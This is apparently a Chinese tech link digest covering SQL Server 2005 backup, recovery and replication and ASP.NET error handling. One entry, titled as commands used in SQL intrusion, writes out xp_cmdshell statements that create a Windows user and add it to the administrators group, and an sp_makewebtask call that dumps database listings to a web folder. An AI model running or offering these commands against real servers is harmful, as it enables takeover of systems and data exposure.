本周技术关注[面向webapps运维]:MSSQL2005 数据备份、恢复、数据复制等

  • [SQLSERVER 2000&2005] MSSQL2005 数据备份、恢复、数据复制等 #
    SQL Server 2005 盛宴系列之十四:数据备份与恢复 讲述如何在SQL Server 2005中进行数据库的备份与恢复,详细讨论新的增强特性,如在线恢复的机制和快速恢复。 SQL Server 2005 盛宴系列之十五:灾难恢复最佳实践 SQL Server 2005 盛宴系列之十六:数据复制服务 介绍SQL Server 2005中数据复制的原理、机制和配置过程,并重点介绍相对于原有版本的功能和性能增强(Peer-to-pee事务复制、安全性增强、管理性增强、使用Web同步等)。 SQL Server 2005 盛宴系列之十七:实现SQL Server与Oracle之间数据复制

  • [数据库及WEB安全] sql入侵中用到的一些命令[更新:2006.5.23] #
    sql入侵中用到的一些命令[更新:2006.5.23] /* * 功能:通过xp_cmdshell执行命令 * 本例:添加一个系统帐号,并加入管理员组. */exec master.xp_cmdshell 'net user kgdiwss 123 /add'exec master.xp_cmdshell 'net localgroup administrators kgdiwss /add'/* * 功能:将执行结果写入htm文件 * 注意:文件夹需要有写入的权限. */exec sp_makewebtask 'F:\wwwroot\kgdiwss\test\result.htm', /* 写入路径,也可以是http地址 */'SELECT * FROM sysdatabases' /* 要执行的sql语句 */

  • [run2tech] DotNetBips.com :: The .NET Knowledge Base #
    In this article we will examine the first method. The reason I used this method in above described scenario is because of its simplicity and quick implementation. In advanced and more generic scenarios you may opt for the other two options.
  • [run2tech] DotNetBips.com :: The .NET Knowledge Base #
    When a runtime error occurs in ASP.NET an exception is thrown. Exceptions offer a myriad of benefits over the classic ASP error-handling model, including object-based errors, the ability to catch errors by type, and the ease of implementing structured error handling. But there are instances in every application when exceptions are not caught, and the result is a dreaded sight for developers: the default ASP.NET error page.

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